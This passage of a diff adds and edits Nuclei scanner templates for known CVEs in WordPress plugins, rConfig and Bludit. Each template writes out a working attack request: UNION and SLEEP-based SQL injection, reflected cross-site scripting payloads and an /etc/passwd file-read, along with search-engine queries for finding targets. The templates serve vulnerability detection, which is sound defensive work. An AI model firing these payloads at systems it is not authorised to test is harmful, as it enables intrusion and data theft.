|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
||||||
|
- "Keyword"
|
||||||
|
- "g-auto-hyperlink-edit"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_2
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2021-24791
|
||||||
|
info:
|
||||||
|
name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
|
||||||
|
remediation: Fixed in version 1.1.14
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24791
|
||||||
|
- https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f
|
||||||
|
- https://wordpress.org/plugins/header-footer-code-manager/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cve-id: CVE-2021-24791
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
google-query: inurl: "/plugins/header-footer-code-manager/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2,"Add New Snippet")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2021-24915
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Contest Gallery < 13.1.0.6 - SQL injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
|
||||||
|
remediation: Fixed in version 13.1.0.6
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
|
||||||
|
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
|
||||||
|
- https://wordpress.org/plugins/contest-gallery/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-24915
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
public-query: "/wp-content/plugins/contest-gallery/"
|
||||||
|
tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'WpUserId'
|
||||||
|
- 'Username'
|
||||||
|
- 'Usermail'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/csv'
|
||||||
|
- 'filename='
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24979
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
|
||||||
|
remediation: version 2.6.6
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24979
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2021-24979
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/paid-memberships-pro/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
|
||||||
|
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
|
||||||
|
condition: and
|
|
@ -1,61 +1,38 @@
|
||||||
id: CVE-2021-25016
|
id: CVE-2021-25016
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Chaty < 2.8.2 - Cross-Site Scripting
|
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
|
||||||
author: luisfelipe146
|
author: r3Y3r53
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
|
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
|
||||||
remediation: Fixed in 2.8.3
|
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
|
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
|
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
|
||||||
classification:
|
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
||||||
cvss-score: 6.1
|
|
||||||
cve-id: CVE-2021-25016
|
|
||||||
cwe-id: CWE-79
|
|
||||||
epss-score: 0.00095
|
|
||||||
epss-percentile: 0.39536
|
|
||||||
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 2
|
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
|
||||||
vendor: premio
|
|
||||||
product: chaty
|
|
||||||
framework: wordpress
|
|
||||||
publicwww-query: "/wp-content/plugins/chaty/"
|
|
||||||
tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
|
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /wp-login.php HTTP/1.1
|
POST /wp-login.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
redirects: true
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: body
|
dsl:
|
||||||
words:
|
- 'status_code_2 == 200'
|
||||||
- "search=</script><img src onerror=alert(document.domain)>"
|
- 'contains(body_2, "<script>alert(document.domain)</script>")'
|
||||||
- "chaty_page_chaty"
|
- 'contains(body_2, "Chaty")'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- text/html
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2021-25079
|
||||||
|
info:
|
||||||
|
name: Contact Form Entries < 1.2.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
|
||||||
|
remediation: Fixed in version 1.1.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
|
||||||
|
- https://wordpress.org/plugins/contact-form-entries/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"
|
||||||
|
condition: and
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2021-29006
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.6 - Local File Inclusion
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
|
||||||
|
reference:
|
||||||
|
- https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-29006
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2021-29006
|
||||||
|
cwe-id: CWE-22
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2021,rconfig,authenticated,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /dashboard.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body_3
|
||||||
|
regex:
|
||||||
|
- 'root:.*:0:0:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- 'rconfig'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2021-35323
|
||||||
|
info:
|
||||||
|
name: Bludit 3.13.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
|
||||||
|
remediation: Bludit v4.0.0
|
||||||
|
reference:
|
||||||
|
- https://github.com/bludit/bludit/issues/1327
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-35323
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2021-35323
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"Bludit"
|
||||||
|
tags: cve,cve2021,bludit,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /bludit/admin/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /bludit/admin/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: tokenCSRF
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
|
||||||
|
internal: true
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: CVE-2022-0228
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Popup Builder < 4.0.7 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.
|
||||||
|
remediation: update to v.4.0.7
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0228
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cwe-id: CWE-89
|
||||||
|
cve-id: 2022-0228
|
||||||
|
cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/popup-builder/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=7'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains_all(body_2, "first name", "last name", "email")'
|
||||||
|
- 'contains(content_type_2, "application/octet-stream")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2022-0533
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.
|
||||||
|
remediation: upgrade to v.3.0.15
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0533
|
||||||
|
- https://vulners.com/cve/CVE-2022-0533
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2022,xss,ditty,wp,wordpress,wpscan,wp-plugin,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains_all(body_2, "<img src onerror=alert(document.domain)>", "ditty")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2022-0651
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
|
||||||
|
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/wp-statistics/
|
||||||
|
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0651
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0651
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
google-query: inurl:/wp-content/plugins/wp-statistics
|
||||||
|
tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home'-sleep(6)-'¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(header, "application/json")
|
||||||
|
- contains(body, 'Visitor Hit was recorded successfully')
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: nonce
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '_wpnonce=([0-9a-zA-Z]+)'
|
||||||
|
internal: true
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2022-0658
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CommonsBooking < 2.6.8 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.
|
||||||
|
remediation: Fixed in version 2.6.8
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578
|
||||||
|
- https://wordpress.org/plugins/commonsbooking/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0658
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0658
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "application/json")'
|
||||||
|
- 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2022-0787
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
|
||||||
|
remediation: Fixed in version 5.1
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
|
||||||
|
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0787
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- status_code == 200
|
||||||
|
- contains(all_headers, "text/html")
|
||||||
|
- contains(body, 'iTotalDisplayRecords')
|
||||||
|
condition: and
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-0814
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ubigeo de Peru < 3.6.4 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
|
||||||
|
- https://wordpress.org/plugins/ubigeo-peru/
|
||||||
|
remediation: Fixed in version 3.6.4
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-0814
|
||||||
|
